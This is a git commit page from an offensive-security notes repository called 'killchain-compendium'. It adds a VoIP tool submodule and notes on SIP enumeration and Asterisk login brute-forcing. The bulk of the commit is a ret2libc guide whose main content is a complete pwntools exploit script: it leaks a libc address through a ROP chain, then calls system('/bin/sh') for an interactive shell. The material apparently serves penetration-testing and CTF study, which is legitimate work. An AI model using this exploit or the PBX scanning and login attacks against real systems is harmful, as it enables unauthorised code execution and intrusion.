whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bump

This commit is contained in:
Stefan Etringer 2022-01-27 00:43:24 +01:00
parent 27f267281d
commit d17d9c6b5c
4 changed files with 83 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.gitmodules vendored
View File

@ -103,3 +103,6 @@
[submodule "exploit/windows/CrackMapExec"] [submodule "exploit/windows/CrackMapExec"]
path = exploit/windows/CrackMapExec path = exploit/windows/CrackMapExec
url = https://github.com/byt3bl33d3r/CrackMapExec.git url = https://github.com/byt3bl33d3r/CrackMapExec.git
[submodule "telecommunications/sipvicious"]
path = telecommunications/sipvicious
url = https://github.com/EnableSecurity/sipvicious.git

73
exploit/binaries/ret2libc.md
View File

@ -1,8 +1,23 @@
# Ret2libc # Ret2libc
* Check binary via
* `checksec`, PIE shows start address, RELRO shows permissions of r/w to got
* `file`
* Libc is affected by ASLR state of the machine, check via `cat /proc/sys/kernel/randomize_va_space`
* Off = 0
* Partial = 1
* Full = 2
* `got` contains dynamically loaded functions
* `plt` contains used loaded dynamical functions
## Finding offsets ## Finding something to execute
* Interesting stuff to call from inside libc
* `/bin/sh`
* `system`
## libc -- Finding Offsets
### Manually
* On target find `sh` address inside libc * On target find `sh` address inside libc
```sh ```sh
strings -a -t x /lib32/libc.so.6 | grep /bin/sh strings -a -t x /lib32/libc.so.6 | grep /bin/sh
@ -11,3 +26,59 @@ strings -a -t x /lib32/libc.so.6 | grep /bin/sh
```sh ```sh
readelf -s /lib32/libc.so.6 | grep system readelf -s /lib32/libc.so.6 | grep system
``` ```
### Measure the Buffer
* With gef
* `create pattern`
* `run`
* Use pattern
* `pattern search $<register>`
## ROP -- Creating a Chain
* Creating a ROP chain to execute the `/bin/sh` with parameters
* Check
* Architecture
* Calling convention
## Usage
* Create context
```python
#!/usr/bin/env python3
from pwn import *
context.binary = binary = '<binary>'
elf = ELF(binary)
rop = ROP(elf)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p = process()
# ROP I, needed when ASL is enabled
payload = b'A' * 18
payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
payload += p64(elf.got.gets)
payload += p64(elf.plt.puts)
payload += p64(elf.symbols.main)
p.recvline()
p.sendline(payload)
p.recvline()
leak = u64(p.recvline().strip().ljust(8,b'\0')) # ljust, pre padding for alignement
p.recvline()
log.info(f"gets: {hex(leak)}")
libc.address = leak - libc.symbols.gets
log.info(f"libc address: {hex(libc.address)}") # start address should be aligned
# ROP II
payload = b'A' * 18
payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
payload += p64(next(libc.search(b'/bin/sh')))
payload += p64(rop.find_gadget(['ret'])[0])
payload += p64(libc.symbols.system)
p.sendline(payload)
p.recvline()
p.interactive()
```

1
telecommunications/sipvicious Submodule

@ -0,0 +1 @@
Subproject commit db051d8845a11ae458acc79cf5104cef28dc3f25

7
telecommunications/sipvicious.md Normal file
View File

@ -0,0 +1,7 @@
# Sipvicious
* [Enable Security](https://github.com/EnableSecurity/sipvicious.git)
# Enumeration
* Check which PBX is used via `svmap $TARGET_IP`
* Use `msf6 auxiliary(voip/asterisk_login)`